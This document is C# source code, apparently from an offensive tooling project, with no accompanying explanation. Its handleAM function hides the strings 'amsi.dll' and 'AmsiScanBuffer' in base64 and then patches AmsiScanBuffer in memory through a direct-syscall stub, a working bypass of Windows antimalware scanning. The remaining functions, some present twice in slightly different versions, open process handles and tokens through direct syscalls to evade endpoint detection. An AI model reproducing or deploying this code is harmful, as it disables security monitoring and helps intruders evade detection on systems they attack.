public static bool handleAM(SysCallManager sysCall) { var hook = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; uint oldProtect = 0, x = 0; var shellCode = sysCall.GetSysCallAsm("NtWriteVirtualMemory"); DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll"); object[] loadLibrary = { Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw=")) }; IntPtr libraryAddress = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA", typeof(DInvoke.Win32.DELEGATES.LoadLibrary), loadLibrary); object[] procAddress = { libraryAddress, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")) }; var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress", typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress); if (address == IntPtr.Zero) { return(false); } object[] parameters = { (IntPtr)(-1), address, (UIntPtr)hook.Length, (uint)0x004, oldProtect }; IntPtr hProcess = Process.GetCurrentProcess().Handle; IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); oldProtect = (uint)parameters[4]; object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite }; var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtWriteVirtualMemory)); var arguments = new object[] { hProcess, address, hook, (UIntPtr)(hook.Length), IntPtr.Zero }; uint old = 0; parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, old }; response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); var returnValue = sysCallDelegate.DynamicInvoke(arguments); if ((int)returnValue != 0) { return(false); } parameters = new object[] { (IntPtr)(-1), address, (UIntPtr)hook.Length, oldProtect, x }; response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); return(true); }
/////////////////////////// Processes related functions /////////////////////////// public static void GetProcessHandle(int pid, out IntPtr handle, DInvoke.Win32.Kernel32.ProcessAccessFlags flags, SysCallManager sysCall) { handle = IntPtr.Zero; var clientId = new DInvoke.Win32.Kernel32.CLIENT_ID() { UniqueProcess = new IntPtr(pid), UniqueThread = IntPtr.Zero }; var objectAtt = new DInvoke.Win32.Kernel32.OBJECT_ATTRIBUTES(null, 0); DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll"); var shellCode = sysCall.GetSysCallAsm("NtOpenProcess"); object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteReadWrite }; var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcess)); var token = IntPtr.Zero; var arguments = new object[] { handle, flags, objectAtt, clientId }; var returnValue = sysCallDelegate.DynamicInvoke(arguments); handle = (int)returnValue == 0 ? (IntPtr)arguments[0] : IntPtr.Zero; }
public static void GetProcessToken(IntPtr handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS access, out IntPtr currentToken, SysCallManager sysCall) { DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll"); var shellCode = sysCall.GetSysCallAsm("NtOpenProcessToken"); object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite }; var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcessToken)); var token = IntPtr.Zero; var arguments = new object[] { handle, access, token }; uint oldProtect = 0; object[] parameters = { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect }; IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); var returnValue = sysCallDelegate.DynamicInvoke(arguments); currentToken = (int)returnValue == 0 ? (IntPtr)arguments[2] : IntPtr.Zero; }
public static void GetProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SysCallManager sysCall) { var shellCode = sysCall.GetSysCallAsm("NtOpenProcessToken"); var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcessToken)); var token = IntPtr.Zero; var arguments = new object[] { handle, access, token }; var returnValue = sysCallDelegate.DynamicInvoke(arguments); currentToken = (int)returnValue == 0 ? (IntPtr)arguments[2] : IntPtr.Zero; }
public static void GetProcessHandle(int pid, out IntPtr handle, ProcessAccessFlags flags, SysCallManager sysCall) { handle = IntPtr.Zero; var clientId = new CLIENT_ID() { UniqueProcess = new IntPtr(pid), UniqueThread = IntPtr.Zero }; var objectAtt = new OBJECT_ATTRIBUTES(null, 0); var shellCode = sysCall.GetSysCallAsm("NtOpenProcess"); var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcess)); var token = IntPtr.Zero; var arguments = new object[] { handle, flags, objectAtt, clientId }; var returnValue = sysCallDelegate.DynamicInvoke(arguments); handle = (int)returnValue == 0 ? (IntPtr)arguments[0] : IntPtr.Zero; }